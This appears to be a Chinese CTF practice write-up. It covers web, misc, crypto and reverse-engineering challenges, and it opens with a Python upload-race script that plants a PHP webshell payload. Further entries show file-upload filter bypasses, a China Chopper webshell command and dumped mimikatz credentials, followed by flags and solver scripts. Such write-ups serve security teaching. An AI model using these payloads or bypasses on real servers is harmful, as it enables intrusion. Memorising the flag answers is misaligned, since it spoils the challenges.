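REQUEST_TIMEOUT = 10

# Two files in one multipart POST. 'myfile' is presumably the harmless file the
# server accepts; 'lastfile' (disguised as .jpg) carries the payload we try to
# hit while it is still on disk.
data = {
    'myfile': ('first.php', "<?php echo 'hello'?>"),
    'lastfile': ('last.jpg', "<?php system('cat ../flag.php'); ?>"),
}


def file_upload(stop=None):
    """Upload `data` in a loop until `stop` (a multiprocessing.Event) is set.

    With stop=None (the original call shape) this loops forever.  A failed or
    timed-out POST is logged and retried instead of killing the process,
    because one network hiccup must not end the race.
    """
    print('file_upload is running ')
    while stop is None or not stop.is_set():
        try:
            requests.post(base_url, files=data, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as exc:
            print("upload err: %s" % exc)


def cmd_exp(stop=None):
    """Poll every candidate upload path until one returns the flag.

    Each round probes all of CANDIDATE_IDS (the original broke out of the
    sweep at the first miss, so upload_11..15 were never requested).
    Returns the response body that contained 'flag' and sets `stop` so the
    uploader exits too; returns None only if `stop` was set elsewhere first.
    """
    print('cmd_exp is running ')
    while stop is None or not stop.is_set():
        for i in CANDIDATE_IDS:
            url = base_url + "uploads/upload_" + str(i) + ".php"
            try:
                # Bounded wait: an unbounded GET could hang the poller forever.
                response = requests.get(url, timeout=REQUEST_TIMEOUT)
            except requests.RequestException as exc:
                print("err: %s" % exc)
                continue
            # .text, not .content: under Python 3 .content is bytes, so
            # `'flag' in content` raised TypeError on every iteration and the
            # bare except turned the poller into an endless "err" printer.
            if response.status_code == 200 and 'flag' in response.text:
                print(response.text)
                if stop is not None:
                    stop.set()
                return response.text
    return None


if __name__ == '__main__':
    # Shared flag passed explicitly so it works under both fork and spawn.
    found = Event()
    p1 = Process(target=file_upload, args=(found,))
    p2 = Process(target=cmd_exp, args=(found,))
    p1.start()
    p2.start()
    p2.join()
    p1.join()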

<h2 id="web7"><a href="#web7" class="headerlink" title="web7"></a>web7</h2><p>地址:192.168.4.3<br>端口:30007<br>详情:jlweb7</p>
<p>Robots.txt</p>
<p>下载源码</p>
<p>构造cookie 和get 参数</p>
<p>flag{C0okie &amp; c0de AuDit &amp; Hex}</p>
<h2 id="web10"><a href="#web10" class="headerlink" title="web10"></a>web10</h2><p>地址:192.168.4.3<br>端口:30010<br>详情:jlweb10</p>
<p>日志分析，过滤</p>
<h2 id="black-black"><a href="#black-black" class="headerlink" title="black black"></a>black black</h2><p>地址:192.168.4.3<br>端口:20002<br>详情:black black</p>
<p>上传图片，马</p>
<p>连接木马找到flag </p>
<p>flag{56cae2cc2247daa249c0e4cc8b9b3a05}</p>
<h2 id="web6"><a href="#web6" class="headerlink" title="web6"></a>web6</h2><p>地址:192.168.4.3<br>端口:30006<br>详情:jlweb6</p>
<p>文件上传</p>
<p>flag{mIMetyPe &amp; c0ntent!}</p>
<h2 id="web5"><a href="#web5" class="headerlink" title="web5"></a>web5</h2><p>地址:192.168.4.3<br>端口:30005<br>详情:jlweb5</p>
<p>文件上传，后缀双写</p>
<p>filename="1.pphphp"（过滤只删除一次 php 子串，删除后文件名变回 1.php）</p>
<h2 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h2><p>地址:192.168.4.3<br>端口:30008<br>详情:jlweb8</p>
<p>%00 截断读文件（空字节截断文件名，只对 PHP &lt; 5.3.4 有效）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">//被你找到啦 flag&#123;JusT_Cut_1t_Off!&#125;</span><br></pre></td></tr></table></figure>

<h2 id="web33【】"><a href="#web33【】" class="headerlink" title="web33【】"></a>web33【】</h2><p>地址:192.168.4.3<br>端口:12001<br>详情:web33</p>
<h2 id="web55"><a href="#web55" class="headerlink" title="web55"></a>web55</h2><p>地址:192.168.4.3<br>端口:12003<br>详情:web55</p>
<p>反序列化。</p>
<h1 id="misc"><a href="#misc" class="headerlink" title="misc"></a>misc</h1><h2 id="misc1"><a href="#misc1" class="headerlink" title="misc1"></a>misc1</h2><img src="/.io//0081Kckwgy1gk7roh431rj30pg0kcdj5.jpg" alt="confuse" style="zoom:50%;">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">strings confuse.jpg</span><br><span class="line">binwalk </span><br><span class="line"></span><br><span class="line">搜索jpg 文件结尾FFD9</span><br><span class="line">后面的数据一次猜猜 png  zip rar  更改头</span><br><span class="line">最终rar成功</span><br><span class="line">有密码，爆破数字</span><br><span class="line">88488</span><br><span class="line">得到png</span><br></pre></td></tr></table></figure>

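# -*- coding: utf-8 -*-
# Recover the true width/height of a PNG whose IHDR dimensions were tampered
# with: the IHDR CRC still covers the original values, so search for the
# (width, height) pair that reproduces the stored CRC.
import os
import binascii
import struct

# IHDR layout as file offsets: 8-byte signature, 4-byte length, chunk type at
# [12:16], width [16:20], height [20:24], five 1-byte fields [24:29]
# (bit depth, colour type, compression, filter, interlace), CRC at [29:33].
# The CRC is computed over chunk type + chunk data.
IHDR_TYPE = slice(12, 16)
IHDR_TAIL = slice(24, 29)
IHDR_CRC = slice(29, 33)


def find_dimensions(misc, expected_crc=None, max_width=4096, max_height=4096):
    """Brute-force the IHDR dimensions of the PNG bytes `misc`.

    misc:         raw PNG file contents (at least the first 33 bytes).
    expected_crc: CRC to match, as an unsigned int.  Defaults to the CRC
                  stored in the file itself (the original script hard-coded
                  0x9F26B38, the value from chocolate.png).
    max_width, max_height: exclusive upper bounds of the search.
    Returns (width, height) for the first match in width-major ascending
    order (same order as the original nested loops), or None if nothing in
    the range matches.
    Raises ValueError when `misc` is too short to hold an IHDR chunk.
    """
    if len(misc) < 33:
        raise ValueError("not a PNG header: fewer than 33 bytes")
    if expected_crc is None:
        expected_crc = struct.unpack('>I', misc[IHDR_CRC])[0]
    chunk_type = misc[IHDR_TYPE]
    tail = misc[IHDR_TAIL]
    for width in range(max_width):
        for height in range(max_height):
            # '>I': PNG stores dimensions as unsigned 32-bit big-endian.
            data = chunk_type + struct.pack('>I', width) + struct.pack('>I', height) + tail
            if binascii.crc32(data) & 0xffffffff == expected_crc:
                return width, height
    return None


if __name__ == '__main__':
    with open("chocolate.png", "rb") as fh:
        misc = fh.read()
    found = find_dimensions(misc)
    if found is None:
        print('no (width, height) in range reproduces the stored CRC')
    else:
        width, height = found
        print('width=' + str(width) + '\n' + 'height=' + str(height))
        print(hex(width), hex(height))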



<p><img src="/.io//0081Kckwgy1gk7uegvgpcj303n01r0sn.jpg" alt="image-20201031005001666"></p>
<h2 id="misc3"><a href="#misc3" class="headerlink" title="misc3"></a>misc3</h2><p>流量题</p>
<p>Wireshark, 追踪到HTTP，发现压缩包，解压需要密码，</p>
<p>search password </p>
<p>在流量中发现 mimikatz 的输出（wdigest 明文凭据转储），其中的密码就是压缩包密码：</p>
<p>wdigest :    </p>
<p>​     * Username : Administrator</p>
<p>​     * Domain   : USER-20180804NL</p>
<p>​     * Password : caibudaodemima</p>
<p>解压得flag</p>
<p>flag{913c79fc074ef505f2302102a86711cb}</p>
<p><img src="/.io//0081Kckwgy1gk7uv7u0pvj308703z0sq.jpg" alt="image-20201031010610850"></p>
<h2 id="Misc4"><a href="#Misc4" class="headerlink" title="Misc4"></a>Misc4</h2><p>发现（第一段文字的大小写本身也可能是培根密码，小写视为 a、大写视为 b，对应下面脚本里注释掉的 bacon2；第二段是标准的 a/b 五位一组）：</p>
<p>bacoN is one of aMerICa’S sWEethEartS. it’s A dARlinG, SuCCulEnt fOoD tHAt PaIRs FlawLE</p>
<p>aaaab aaaaa aaaba abbba abbab abaaa baaba aaaba abbba abbba ababb aabaa baaab</p>
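# -*- coding: utf-8 -*-
# Bacon cipher decoders.  cipher1 is the 26-letter variant (one code per
# letter); cipher2 is the classic 24-letter variant in which I/J and U/V
# share a code, which is why two entries are duplicated there.  Both decode
# into the lower-case alphabet letters2; letters1 is kept for reference.

letters1 = [
    'A', 'B', 'C', 'D', 'E', 'F', 'G',
    'H', 'I', 'J', 'K', 'L', 'M', 'N',
    'O', 'P', 'Q', 'R', 'S', 'T',
    'U', 'V', 'W', 'X', 'Y', 'Z',
    ]
letters2 = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g',
    'h', 'i', 'j', 'k', 'l', 'm', 'n',
    'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z',
    ]
cipher1 = [
    "aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba",
    "aabbb", "abaaa", "abaab", "ababa", "ababb", "abbaa", "abbab",
    "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb",
    "babaa", "babab", "babba", "babbb", "bbaaa", "bbaab",
    ]
cipher2 = [
    "AAAAA", "AAAAB", "AAABA", "AAABB", "AABAA", "AABAB", "AABBA",
    "AABBB", "ABAAA", "ABAAA", "ABAAB", "ABABA", "ABABB", "ABBAA",
    "ABBAB", "ABBBA", "ABBBB", "BAAAA", "BAAAB", "BAABA",
    "BAABB", "BAABB", "BABAA", "BABAB", "BABBA", "BABBB",
    ]


def _decode(string, table):
    """Split `string` into 5-symbol groups and translate each through `table`.

    Every index of `table` holding the group is emitted, so with cipher2 the
    ambiguous group 'ABAAA' yields 'ij' and 'BAABB' yields 'uv' (both
    readings are shown).  Groups absent from `table` - including a trailing
    partial group - are dropped silently.  Returns the decoded text.
    """
    lookup = {}
    for idx, code in enumerate(table):
        lookup.setdefault(code, []).append(letters2[idx])
    groups = (string[pos:pos + 5] for pos in range(0, len(string), 5))
    return ''.join(''.join(lookup.get(group, [])) for group in groups)


def bacon1(string):
    """Decode a lower-case a/b string with the 26-letter table.

    Prints the plaintext (as before) and now also returns it.
    """
    letter = _decode(string, cipher1)
    print(letter)
    return letter


def bacon2(string):
    """Decode an upper-case A/B string with the 24-letter table.

    Prints the plaintext (as before) and now also returns it.
    """
    letter = _decode(string, cipher2)
    print(letter)
    return letter


if __name__ == "__main__":
    mi = 'aaaab aaaaa aaaba abbba abbab abaaa baaba aaaba abbba abbba ababb aabaa baaab'
    mi = mi.replace(" ", '')
    bacon1(mi)
    #bacon2("AABABABABAAAAAAAABBA")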

<h2 id="代号"><a href="#代号" class="headerlink" title="代号"></a>代号</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">strings 代号.jpg | grep -E .\&#123;6,200\&#125;</span><br><span class="line">无果</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">╭─dong@dongs-MacBook-Pro.local ~/Downloads/4.8上的ctf练习题10.28收集/MISC  </span><br><span class="line">╰─➤  binwalk 代号.jpg               </span><br><span class="line"></span><br><span class="line">DECIMAL       HEXADECIMAL     DESCRIPTION</span><br><span class="line">--------------------------------------------------------------------------------</span><br><span class="line">0             0x0             JPEG image data, JFIF standard 1.01</span><br><span class="line">23949         0x5D8D          Zip archive data, encrypted at least v2.0 to extract, compressed size: 194574, uncompressed size: 200839, name: 1.png</span><br><span class="line">218683        0x3563B         End of Zip archive, footer length: 22</span><br><span class="line"></span><br><span class="line">╭─dong@dongs-MacBook-Pro.local ~/Downloads/4.8上的ctf练习题10.28收集/MISC  </span><br><span class="line">╰─➤  binwalk 
代号.jpg -e</span><br><span class="line"></span><br><span class="line">DECIMAL       HEXADECIMAL     DESCRIPTION</span><br><span class="line">--------------------------------------------------------------------------------</span><br><span class="line">0             0x0             JPEG image data, JFIF standard 1.01</span><br><span class="line">23949         0x5D8D          Zip archive data, encrypted at least v2.0 to extract, compressed size: 194574, uncompressed size: 200839, name: 1.png</span><br><span class="line">218683        0x3563B         End of Zip archive, footer length: 22</span><br><span class="line"></span><br><span class="line">爆破 密码9527</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="/.io//0081Kckwgy1gk897bpq5jj30b702o0so.jpg" alt="2"></p>
<h2 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h2><p>​    发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@ini_set(&quot;display_errors&quot;,&quot;0&quot;);@set_time_limit(0);if(PHP_VERSION&lt;&#x27;5.3.0&#x27;)&#123;@set_magic_quotes_runtime(0);&#125;;echo(&quot;X@Y&quot;);$F=&quot;C:\\wwwroot\\flag.tar.gz&quot;;$fp=@fopen($F,&#x27;r&#x27;);if(@fgetc($fp))&#123;@fclose($fp);@readfile($F);&#125;else&#123;echo(&#x27;ERROR:// Can Not Read&#x27;);&#125;;echo(&quot;X@Y&quot;);die();</span><br></pre></td></tr></table></figure>

<p>这段 payload 是菜刀（China Chopper）类 webshell 的命令：读取 C:\wwwroot\flag.tar.gz，并把文件内容夹在两个 X@Y 标记之间回显。从 HTTP 响应流里取出两个 X@Y 之间的原始字节（按二进制保存，不要当文本复制）存为 1.tar.gz，解压得 flag。</p>
<p>key{8769fe393f2b998fa6a11afe2bfcd65e}</p>
<h1 id="crypto"><a href="#crypto" class="headerlink" title="crypto"></a>crypto</h1><h2 id="jusbbase64"><a href="#jusbbase64" class="headerlink" title="jusbbase64"></a>jusbbase64</h2><blockquote>
<p>考点：base64换表 </p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VGhlIGdlb@xvZ#kgb@YgdGhlIEVhcnRoJ#Mgc#VyZmFjZSBpcyBkb@!pbmF)ZWQgYnkgdGhlIHBhcnRpY#VsYXIgcHJvcGVydGllcyBvZiB#YXRlci$gUHJlc@VudCBvbiBFYXJ)aCBpbiBzb@xpZCwgbGlxdWlkLCBhbmQgZ@FzZW(!cyBzdGF)ZXMsIHdhdGVyIGlzIGV$Y@VwdGlvbmFsbHkgcmVhY#RpdmUuIEl)IGRpc#NvbHZlcywgdHJhbnNwb#J)cywgYW%kIHByZWNpcGl)YXRlcyBtYW%%IGNoZW!pY@FsIGNvbXBvdW%kcyBhbmQgaXMgY@(uc#RhbnRseSBtb@RpZnlpbmcgdGhlIGZhY@Ugb@YgdGhlIEVhcnRoLiBFdmFwb#JhdGVkIGZyb@)gdGhlIG(jZWFucywgd@F)ZXIgdmFwb#IgZm(ybXMgY@xvdWRzLCBzb@!lIG(mIHdoaWNoIGFyZSB)cmFuc#BvcnRlZCBieSB#aW%kIG(@ZXIgdGhlIGNvbnRpbmVudHMuIENvbmRlbnNhdGlvbiBmcm(tIHRoZSBjbG(!ZHMgcHJvdmlkZXMgdGhlIGVzc@VudGlhbCBhZ@VudCBvZiBjb@%)aW%lbnRhbCBlcm(zaW(uOiByYWluLlRoZSByYXRlIGF)IHdoaWNoIGEgbW(sZWN!bGUgb@Ygd@F)ZXIgcGFzc@VzIHRob#VnaCB)aGUgY#ljbGUgaXMgbm()IHJhbmRvbQpBbmQgdGhlIGZsYWcgaXM^IENURnsyMi!RV)VSVFlVSU*tUExLSkhHRkRTLUFaWENWQk%NfQ== </span><br></pre></td></tr></table></figure>

<p>题目把 base64 编码表中的 0123456789 依次替换成了 )!@#$%^&amp;*(（即美式键盘上 Shift+数字键得到的符号：0→)，1→!，2→@，…，9→(）。先把这些符号映射回对应数字，再按标准 base64 解码即可。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag is: CTF&#123;22-QWERTYUIO-PLKJHGFDS-AZXCVBNM&#125;</span><br></pre></td></tr></table></figure>





<h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><h2 id="test1"><a href="#test1" class="headerlink" title="test1"></a>test1</h2><p>给 serial，求 name。反汇编得到的校验逻辑如下：name 的每个字节依次与 16、32、48 循环异或，结果须等于 serial。</p>
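# Check routine recovered from the disassembly of test1.  The key index `i`
# is advanced after every byte (the first transcription omitted `i += 1`, so
# the key never rotated past 16); the keygen below undoes exactly this.
def check_serial(inputname, serial):
    """Return True when `inputname` (str) encodes to `serial`.

    serial: list of ints, one per name byte - name[j] ^ v6[j % 3].
    """
    v6 = [16, 32, 48]
    v13 = []
    i = 0
    for j in range(len(inputname)):
        if i >= 3:
            i = 0
        v13.append(ord(inputname[j]) ^ v6[i])
        i += 1
    return serial == v13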

# Keygen for test1: undo the rotating XOR (keys 16, 32, 48) on the serial
# bytes to recover the name that produces it.
v13 = "5B,13,49,77,13,5E,7D,13"
v6 = [16, 32, 48]
v9 = ""
for pos, hex_byte in enumerate(v13.split(',')):
    # Key index cycles 0,1,2,0,...; pos % 3 replaces the manual reset.
    v9 += chr(int(hex_byte, 16) ^ v6[pos % len(v6)])
print(v9)
# K3yg3nm3



<h2 id="test2"><a href="#test2" class="headerlink" title="test2"></a>test2</h2><blockquote>
<p>Test.pyc（用 uncompyle6 反编译。encode 对每个字节先异或 32 再加 16，然后 base64；逆过程是先 base64 解码，再对每个字节先减 16 再异或 32：<code>''.join(chr((b - 16) ^ 32) for b in base64.b64decode(correct))</code>）</p>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">╰─➤  uncompyle6 test2.pyc </span><br><span class="line"># uncompyle6 version 3.7.4</span><br><span class="line"># Python bytecode 2.7 (62211)</span><br><span class="line"># Decompiled from: Python 3.6.12 |Anaconda, Inc.| (default, Sep  8 2020, 17:50:39) </span><br><span class="line"># [GCC Clang 10.0.0 ]</span><br><span class="line"># Embedded file name: 1.py</span><br><span class="line"># Compiled at: 2017-06-03 10:20:43</span><br><span class="line">import base64</span><br><span class="line"></span><br><span class="line">def encode(message):</span><br><span class="line">    s = &#x27;&#x27;</span><br><span class="line">    for i in message:</span><br><span class="line">        x = ord(i) ^ 32</span><br><span class="line">        x = x + 16</span><br><span class="line">        s += chr(x)</span><br><span class="line"></span><br><span class="line">    return base64.b64encode(s)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">correct = 
&#x27;XlNkVmtUI1MgXWBZXCFeKY+AaXNt&#x27;</span><br><span class="line">flag = &#x27;&#x27;</span><br><span class="line">print &#x27;Input flag:&#x27;</span><br><span class="line">flag = raw_input()</span><br><span class="line">if encode(flag) == correct:</span><br><span class="line">    print &#x27;correct&#x27;</span><br><span class="line">else:</span><br><span class="line">    print &#x27;wrong&#x27;</span><br><span class="line"># okay decompiling test2.pyc</span><br></pre></td></tr></table></figure>

<h2 id="test3"><a href="#test3" class="headerlink" title="test3"></a>test3</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> arr[<span class="number">18</span>] =</span><br><span class="line">&#123;</span><br><span class="line">  <span class="number">160</span>,</span><br><span class="line">  <span class="number">230</span>,</span><br><span class="line">  <span class="number">122</span>,</span><br><span class="line">  <span class="number">286</span>,</span><br><span class="line">  <span class="number">230</span>,</span><br><span class="line">  <span class="number">144</span>,</span><br><span class="line">  <span class="number">290</span>,</span><br><span class="line">  <span class="number">208</span>,</span><br><span class="line">  <span class="number">240</span>,</span><br><span class="line">  <span class="number">144</span>,</span><br><span class="line">  <span 
class="number">300</span>,</span><br><span class="line">  <span class="number">216</span>,</span><br><span class="line">  <span class="number">290</span>,</span><br><span class="line">  <span class="number">244</span>,</span><br><span class="line">  <span class="number">240</span>,</span><br><span class="line">  <span class="number">100</span>,</span><br><span class="line">  <span class="number">256</span>,</span><br><span class="line">  <span class="number">310</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, flag);</span><br><span class="line">  length = <span class="built_in">strlen</span>(flag);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; length; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v3 = (<span class="keyword">unsigned</span> __int8)(flag[i] &gt;&gt; <span class="number">11</span>) &gt;&gt; <span class="number">4</span>;</span><br><span class="line">    a = (<span class="keyword">char</span>)(((v3 + (flag[i] &gt;&gt; <span class="number">4</span>)) &amp; <span class="number">0xF</span>) - v3);</span><br><span class="line">    v4 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(<span class="number">16</span> * flag[i] &gt;&gt; <span class="number">35</span>) &gt;&gt; <span class="number">28</span>;</span><br><span class="line">    b = (((_BYTE)v4 + (<span class="keyword">unsigned</span> __int8)(<span class="number">16</span> * flag[i] &gt;&gt; <span class="number">4</span>)) &amp; <span class="number">0xF</span>) - v4;</span><br><span class="line">    c = <span class="number">22</span> * a + <span class="number">12</span> * b;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 爆破</span></span><br><span class="line">arr = [<span class="number">0xA0</span>, <span class="number">0xE6</span>, <span class="number">0x7A</span>, <span class="number">0x11E</span>, <span class="number">0xE6</span>, <span class="number">0x90</span>, <span class="number">0x122</span>, <span class="number">0xD0</span>, <span class="number">0xF0</span>, <span class="number">0x90</span>, <span class="number">0x12C</span>, <span class="number">0xD8</span>, <span class="number">0x122</span>, <span class="number">0xF4</span>, <span class="number">0xF0</span>, <span class="number">0x64</span>, <span class="number">0x100</span>, <span class="number">0x136</span>]</span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">18</span>):</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">33</span>,<span class="number">126</span>):</span><br><span class="line">        a = (j &gt;&gt; <span class="number">11</span>) &gt;&gt; <span class="number">4</span></span><br><span class="line">        b = (a + (j &gt;&gt; <span class="number">4</span>) &amp; <span class="number">0xF</span>) -a</span><br><span class="line">        c = (<span 
class="number">16</span> * j &gt;&gt; <span class="number">35</span>) &gt;&gt; <span class="number">28</span></span><br><span class="line">        d = (c + (<span class="number">16</span> * j &gt;&gt; <span class="number">4</span>) &amp; <span class="number">0xF</span>) -c</span><br><span class="line">        e = <span class="number">22</span> * b + <span class="number">12</span> * d</span><br><span class="line">        <span class="keyword">if</span>(e == arr[i]):</span><br><span class="line">            flag += <span class="built_in">chr</span>(j)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br><span class="line"><span class="comment"># FZQ&#123;Za_Jiang_MiAN&#125;</span></span><br></pre></td></tr></table></figure>

<h2 id="test4-迷宫题"><a href="#test4-迷宫题" class="headerlink" title="test4 迷宫题"></a>test4 迷宫题</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 画迷宫</span></span><br><span class="line">s = <span class="string">&quot;11111111111111111111111111111111111111111111111111111111111111111111...............111111111111111...............111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111s111111111111111.1111111111111s111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.11111111111111111111111111111.1111.111111111111111111111111.1t............111111111111111.1t............111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111.1111111111111.111111111111111...............111111111111111...............1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">19</span>):</span><br><span class="line">    <span class="built_in">print</span>(s[(i-<span class="number">1</span>)*<span class="number">60</span>:i*<span 
class="number">60</span>])</span><br><span class="line">    </span><br><span class="line"><span class="comment"># wwwwaaaaaaaaaaaaaasssssssssssssssddddddddddddddwwwwwwwaaaaaaaaaaaa</span></span><br></pre></td></tr></table></figure>



<h2 id="maze-迷宫题"><a href="#maze-迷宫题" class="headerlink" title="maze 迷宫题"></a>maze 迷宫题</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 改进版，若确定了左右，只输出4种可能。</span></span><br><span class="line"><span class="keyword">import</span> random</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> permutations</span><br><span class="line">b=<span class="string">&quot;DSDDSSASSSDDDDWWAA&quot;</span>  <span class="comment"># wsad 上下左右</span></span><br><span class="line">a=[<span class="string">&quot;o&quot;</span>,<span class="string">&quot;O&quot;</span>,<span class="string">&quot;.&quot;</span>,<span class="string">&quot;0&quot;</span>]</span><br><span class="line">left_right = [<span class="string">&quot;o&quot;</span>,<span class="string">&quot;O&quot;</span>] <span class="comment"># 确定左或右在其中</span></span><br><span class="line"></span><br><span class="line">aa = <span class="built_in">list</span>(permutations(a))</span><br><span class="line">results=[]</span><br><span class="line"><span class="keyword">for</span> a3 <span class="keyword">in</span> aa:</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;left_right&quot;</span> <span 
class="keyword">in</span> <span class="built_in">dir</span>() <span class="keyword">and</span> <span class="built_in">len</span>(left_right)==<span class="number">2</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(<span class="built_in">set</span>(<span class="built_in">list</span>(a3[:<span class="number">2</span>]) + left_right)) != <span class="number">2</span> :</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">    b1=b.replace(<span class="string">&quot;A&quot;</span>,a3[<span class="number">0</span>])</span><br><span class="line">    b2=b1.replace(<span class="string">&quot;D&quot;</span>,a3[<span class="number">1</span>])</span><br><span class="line">    b3=b2.replace(<span class="string">&quot;W&quot;</span>,a3[<span class="number">2</span>])</span><br><span class="line">    b4=b3.replace(<span class="string">&quot;S&quot;</span>,a3[<span class="number">3</span>])</span><br><span class="line">    results.append(b4)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> res <span class="keyword">in</span> results:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;nctf&#123;&quot;</span>+res+<span class="string">&quot;&#125;&quot;</span>)</span><br></pre></td></tr></table></figure>

